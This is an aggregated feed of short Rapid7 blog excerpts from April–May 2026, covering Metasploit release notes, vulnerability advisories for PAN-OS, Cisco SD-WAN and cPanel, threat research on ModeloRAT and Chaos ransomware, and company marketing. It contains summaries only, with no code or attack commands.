Intelligence Feed
Metasploit Wrap-Up 05/15/2026
Rapid7 Blog
15 May 2026
SEV 7/10
Metasploit Wrap-Up 05/15/2026 Back to Blog Products and Tools Metasploit Wrap-Up 05/15/2026 Martin Sutovsky May 15, 2026 | Last updated on May 15, 2026 | xx min read Weaponizing a text editor for fun and profit Gather round, dear readers, because today, we (by we, we mean @h00die) dropped the ultimate persistence mechanism: Vim plugin persistence. And honestly, calling it "persistence" feels redundant — Vim is already the most persistent thing ever. Somewhere, somehow, there will still be a Vim session open since 2011, because no one has figured out how to close it.
CVE-2026-0265: Authentication Bypass in Palo Alto Networks PAN-OS
Rapid7 Blog
14 May 2026
SEV 6/10
CVE-2026-0265: Authentication Bypass in Palo Alto Networks PAN-OS Back to Blog Vulnerabilities and Exploits CVE-2026-0265: Authentication Bypass in Palo Alto Networks PAN-OS Rapid7 May 14, 2026 | Last updated on May 14, 2026 | xx min read DISCOVER RAPID7 MDR Overview On May 13, 2026, Palo Alto Networks published a security advisory CVE-2026-0265 , a signature verification vulnerability that facilitates authentication bypass on PAN-OS , the operating system that most Palo Alto Networks firewalls run. This vulnerability allows a remote unauthenticated attacker with network access to bypass authentication when Cloud Authentication Service (CAS) is enabled and attached to a login interface; the vulnerable configuration is non-default but common. CVE-2026-0265 affects PAN-OS on PA-Series and VM-Series firewalls, as well as Panorama (virtual and M-Series) appliances.
The Dark Side of Efficiency: When Network Controllers Become "God Mode" for Attackers
Rapid7 Blog
14 May 2026
SEV 1/10
When Network Controllers Become "God Mode" for Attackers Back to Blog Vulnerabilities and Exploits The Dark Side of Efficiency: When Network Controllers Become "God Mode" for Attackers Douglas McKee, Director, Vulnerability Intelligence May 14, 2026 | Last updated on May 14, 2026 | xx min read REGISTER FOR THE WEBINAR Imagine you build a massive corporate campus with every security control money can buy. Maybe something similar to the infamous Death Star. Then, somewhere along the way, somebody decides the maintenance team needs a universal key that opens every door in the building without setting off any alarms.
CVE-2026-20182: Critical authentication bypass in Cisco Catalyst SD-WAN Controller (FIXED)
Rapid7 Blog
14 May 2026
SEV 8/10
CVE-2026-20182: Critical authentication bypass in Cisco Catalyst SD-WAN Controller (FIXED) Back to Blog Vulnerabilities and Exploits CVE-2026-20182: Critical authentication bypass in Cisco Catalyst SD-WAN Controller (FIXED) Jonah Burgess | Stephen Fewer May 14, 2026 | Last updated on May 14, 2026 | xx min read DISCOVER RAPID7 MDR Overview While researching a critical authentication bypass vulnerability, CVE-2026-20127 , which was exploited in-the-wild , Rapid7 Labs discovered a new authentication bypass vulnerability affecting Cisco Catalyst SD-WAN Controller (formerly known as vSmart), CVE-2026-20182 . This new authentication bypass vulnerability affects the “vdaemon” service over DTLS (UDP port 12346), which is the same service that was vulnerable to CVE-2026-20127. The new vulnerability is not a patch bypass of CVE-2026-20127.
When IT Support Calls: Dissecting a ModeloRAT Campaign from Teams to Domain Compromise
Rapid7 Blog
13 May 2026
SEV 9/10
Pluribus and the Path to Domain Compromise: A ModeloRAT Case Study Back to Blog Threat Research When IT Support Calls: Dissecting a ModeloRAT Campaign from Teams to Domain Compromise Anna Širokova May 13, 2026 | Last updated on May 13, 2026 | xx min read DISCOVER RAPID7 MDR Overview Attackers do not need to break into the front door when they can convince employees to open it for them through the tools they already trust. In April 2026, Rapid7 investigated an enterprise intrusion that began with a Microsoft Teams message from a fake “IT Support” account and quickly escalated into a full compromise chain involving malware deployment, privilege escalation, credential theft, lateral movement, and exfiltration. The incident illustrates a critical risk for modern enterprises: Collaboration platforms have become part of the attack surface, and when combined with identity abuse and Living-off-the-Land techniques, they can provide attackers with a low-friction path into the environment.
Rapid7 Partner Academy: Driving Impact with Gold Stevie Award-Winning Partner Services Certifications
Rapid7 Blog
13 May 2026
SEV 2/10
Rapid7 Drives Partner Impact with Stevie Award-Winning Certifications Back to Blog Culture Rapid7 Partner Academy: Driving Impact with Gold Stevie Award-Winning Partner Services Certifications Rapid7 May 13, 2026 | Last updated on May 13, 2026 | xx min read DISCOVER RAPID7 MDR At Rapid7, our commitment to our partners is built on the foundation of the PACT (Partnering with Accountability, Consistency, and Transparency) program. Central to this mission is the Rapid7 Partner Academy, which was recently honored with a Gold Stevie Award in the 2026 American Business Awards® for Achievement in Collaboration and Partnership . This recognition underscores our dedication to providing world-class training that translates directly into partner success and customer resilience.
Patch Tuesday - May 2026
Rapid7 Blog
13 May 2026
SEV 8/10
Patch Tuesday - May 2026 Back to Blog Exposure Management Patch Tuesday - May 2026 Adam Barnett May 13, 2026 | Last updated on May 13, 2026 | xx min read Microsoft is publishing 137 vulnerabilities on May 2026 Patch Tuesday . Microsoft is not aware of exploitation in the wild or public disclosure for any of these vulnerabilities. So far this month, Microsoft has provided patches to address 133 browser vulnerabilities, which are not included in the Patch Tuesday count above.
How Rapid7 is bringing Cyber GRC closer to security operations
Rapid7 Blog
12 May 2026
SEV 4/10
How Rapid7 is Bringing Cyber GRC Closer To Security Operations Back to Blog Security Operations How Rapid7 is bringing Cyber GRC closer to security operations Sabeen Malik May 8, 2026 | Last updated on May 12, 2026 | xx min read DISCOVER RAPID7 MDR Sabeen Malik is VP, Global Government Affairs and Public Policy at Rapid7. ⠀ Security teams need a better way to connect what they detect, what they fix, and what they can prove. The pace of modern security operations no longer works in defenders’ favor.
Final Countdown: Last Chance to Join the Rapid7 Global Cybersecurity Summit
Rapid7 Blog
11 May 2026
SEV 2/10
Over the past few weeks, we’ve shared a preview of what to expect, from the sessions and speakers to the themes running across the agenda. What has become increasingly clear is how closely these topics are connected. Security teams are being asked to move beyond reacting to incidents and instead understand how attacks begin, how they evolve, and how decisions can be made earlier with greater confidence.
Metasploit Wrap-Up 05/08/2026
Rapid7 Blog
08 May 2026
SEV 4/10
Metasploit Wrap-Up 05/08/2026 Back to Blog Products and Tools Metasploit Wrap-Up 05/08/2026 Alan David Foster May 8, 2026 | Last updated on May 8, 2026 | xx min read Spring cleanup This week’s Metasploit updates focused on foundational improvements and expanded target reach. Key enhancements were made to the recently released Copy Fail exploit module, which now benefits from payload fixes in linux/x64/exec and linux/armle/exec. These changes expand its capability, enabling the use of the cmd/unix/python/meterpreter/reverse_tcp payload on x64 targets and introducing support for ARMLE Linux.
Zero Chaos: Scaling Detection Engineering at the Speed of Software, with Detection As Code
Rapid7 Blog
08 May 2026
SEV 1/10
Scaling Detection Engineering at the Speed of Software, with Detection As Code Back to Blog Detection and Response Zero Chaos: Scaling Detection Engineering at the Speed of Software, with Detection As Code Zachary Zeid | James Gallahan May 8, 2026 | Last updated on May 8, 2026 | xx min read DISCOVER NEXT-GEN SIEM Every engineering team in your organization ships code through a pipeline. They branch, test, review, and deploy. If something breaks, they roll back.
Rapid7 and OpenAI: Helping Defenders Move at Machine Speed
Rapid7 Blog
07 May 2026
SEV 3/10
Rapid7 and OpenAI: Advancing AI For Preemptive Security Back to Blog Artificial Intelligence Rapid7 and OpenAI: Helping Defenders Move at Machine Speed Wade Woolwine May 7, 2026 | Last updated on May 7, 2026 | xx min read DISCOVER RAPID7 MDR Wade Woolwine is Senior Director, Product Security at Rapid7. Announcing OpenAI's Trusted Access for Cyber program CIOs and CISOs are telling us the same thing in different ways: Advances in frontier AI are accelerating the threat environment and putting pressure on security operating models built for a different pace. Vulnerabilities can be discovered faster, exploitation windows are shrinking, and attackers are increasingly using automation to move with greater speed and scale.
Why Security in 2026 Requires Continuous Threat and Exposure Management (CTEM) at Scale
Rapid7 Blog
07 May 2026
SEV 4/10
Why Security in 2026 Requires Continuous Threat and Exposure Management (CTEM) at Scale Back to Blog Exposure Management Why Security in 2026 Requires Continuous Threat and Exposure Management (CTEM) at Scale James Davis May 7, 2026 | Last updated on May 7, 2026 | xx min read DISCOVER RAPID7 CTEM Let's be honest, the patching window just shrank to something no practitioner or organization can keep up with. Organizations now need to operate in an environment that must assume breach, which means fundamentals like attack surface management, micro-segmentation, identity management, and attack path validation – aka a few core pillars of CTEM – just became the most important initiatives within the cybersecurity department. Rapid7 is the only vendor that provides a truly unified platform to master Continuous Threat Exposure Management (CTEM) .
Critical Buffer Overflow in Palo Alto Networks PAN-OS User-ID Authentication Portal (CVE-2026-0300)
Rapid7 Blog
06 May 2026
SEV 7/10
Critical Buffer Overflow in Palo Alto Networks PAN-OS User-ID Authentication Portal (CVE-2026-0300) Back to Blog Vulnerabilities and Exploits Critical Buffer Overflow in Palo Alto Networks PAN-OS User-ID Authentication Portal (CVE-2026-0300) Jonah Burgess May 6, 2026 | Last updated on May 13, 2026 | xx min read DISCOVER RAPID7 MDR Overview On May 6, 2026, Palo Alto Networks published a security advisory CVE-2026-0300 , a critical unauthenticated buffer overflow vulnerability affecting PAN-OS PA-Series and VM-Series firewall appliances. Prisma Access, Cloud NGFW, and Panorama appliances are not affected by this vulnerability. The vulnerability carries a CVSSv4 score of and has been confirmed as exploited in the wild by the vendor.
Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware
Rapid7 Blog
06 May 2026
SEV 5/10
Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware Back to Blog Threat Research Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware Alexandra Blia | Ivan Feigl May 6, 2026 | Last updated on May 7, 2026 | xx min read DISCOVER RAPID7 MDR Executive summary In early 2026, a sophisticated intrusion initially appearing to be a standard Chaos ransomware attack was assessed to be consistent with a targeted state-sponsored operation. While the threat actor operated under the banner of the Chaos ransomware-as-a-service (RaaS) group, forensic analysis revealed the incident was a "false flag" masquerade. Technical artifacts, including a specific code-signing certificate and Command-and-Control (C2) infrastructure, suggest with moderate confidence that this activity is linked to MuddyWater (Seedworm), an Iranian Advanced Persistent Threat (APT) affiliated with the Ministry of Intelligence and Security (MOIS).
A Walkthrough of the 2026 Global Cybersecurity Summit Agenda
Rapid7 Blog
05 May 2026
SEV 2/10
A Walkthrough of the 2026 Global Cybersecurity Summit Agenda Back to Blog Industry Trends A Walkthrough of the 2026 Global Cybersecurity Summit Agenda Emma Burdett May 5, 2026 | Last updated on May 5, 2026 | xx min read REGISTER FOR THE SUMMIT The full agenda for the Rapid7 2026 Global Cybersecurity Summit is now live, and it gives a clearer sense of how the conversation around security operations is evolving. Across two days, the sessions progress from a shared understanding of how threats are changing into a more detailed look at how teams detect, respond, and make decisions in practice. Day 1: How threats evolve and how teams respond The day opens with a keynote, Defense Starts Earlier Than You Think , where Brian Castagna is joined by Craig Robinson, Research Vice President at IDC, to examine why complexity has become the main barrier to effective security and what changes when teams start acting earlier.
Metasploit Wrap-Up 05/01/2026
Rapid7 Blog
01 May 2026
SEV 4/10
Metasploit Wrap-Up 05/01/2026 Back to Blog Products and Tools Metasploit Wrap-Up 05/01/2026 Christopher Granleese May 1, 2026 | Last updated on May 1, 2026 | xx min read MCP server This release our very own cdelafuente-r7 finished implementing the Metasploit MCP Server (msfmcpd), bringing Model Context Protocol support to Metasploit Framework. MCP lets AI applications like Claude, Cursor, or your own custom agents query Metasploit data. Think of it as a middleware layer that exposes 8 standardized tools for searching modules and pulling reconnaissance data, all built on the official Ruby MCP SDK .
Five Things we Took Away from Gartner SRM Sydney 2026
Rapid7 Blog
29 Apr 2026
SEV 1/10
Five Things we Took Away from Gartner SRM Sydney 2026 Back to Blog Industry Trends Five Things we Took Away from Gartner SRM Sydney 2026 Rapid7 Apr 29, 2026 | Last updated on Apr 29, 2026 | xx min read DISCOVER RAPID7 MDR At this year's Gartner Security and Risk Management Summit in Sydney, Rapid7 CISO Brian Castagna joined industry CISO Nigel Hedges for a fireside chat on the decisions security leaders are actually making right now. They discussed the real decisions being made right now about budgets, burnout, AI, and perspective on consolidation. The conversation reinforced what we see across many organizations: SecOps is very much focused on protecting business resilience, enabling confident decisions by senior security leaders, and building programs that scale across people, platforms, and emerging technology.
CVE-2026-41940: cPanel & WHM Authentication Bypass
Rapid7 Blog
29 Apr 2026
SEV 9/10
CVE-2026-41940: cPanel & WHM Authentication Bypass Back to Blog Vulnerabilities and Exploits CVE-2026-41940: cPanel & WHM Authentication Bypass Rapid7 Apr 29, 2026 | Last updated on May 5, 2026 | xx min read DISCOVER RAPID7 MDR Overview On April 28, 2026, cPanel issued a security update to fix a critical vulnerability affecting the cPanel & WHM WP Squared products. In the cPanel release notes, the bug was described as "an issue with session loading and saving." CVE-2026-41940 , the identifier subsequently assigned on April 29, 2026, has a CVSS score of and allows unauthenticated remote attackers to bypass authentication and gain unauthorized administrative access to the affected systems. First-party vendor advisories are available.
Experts on Experts: The 2026 Threat Landscape is Moving Faster than Defenders Expect
Rapid7 Blog
29 Apr 2026
SEV 2/10
Experts on Experts: The 2026 Threat Landscape is Moving Faster than Defenders Expect Back to Blog Industry Trends Experts on Experts: The 2026 Threat Landscape is Moving Faster than Defenders Expect Craig Adams Apr 29, 2026 | Last updated on Apr 29, 2026 | xx min read DISCOVER RAPID7 MDR This week on Experts on Experts, I’m joined by Christiaan Beek, Rapid7’s VP of Threat Analytics, to talk through what we’re seeing in the 2026 threat landscape and how it connects to recent research coming out of Rapid7 Labs. We start with the report, but quickly move into what’s already playing out in active campaigns. What stands out is not a change in attacker technique, but the pace.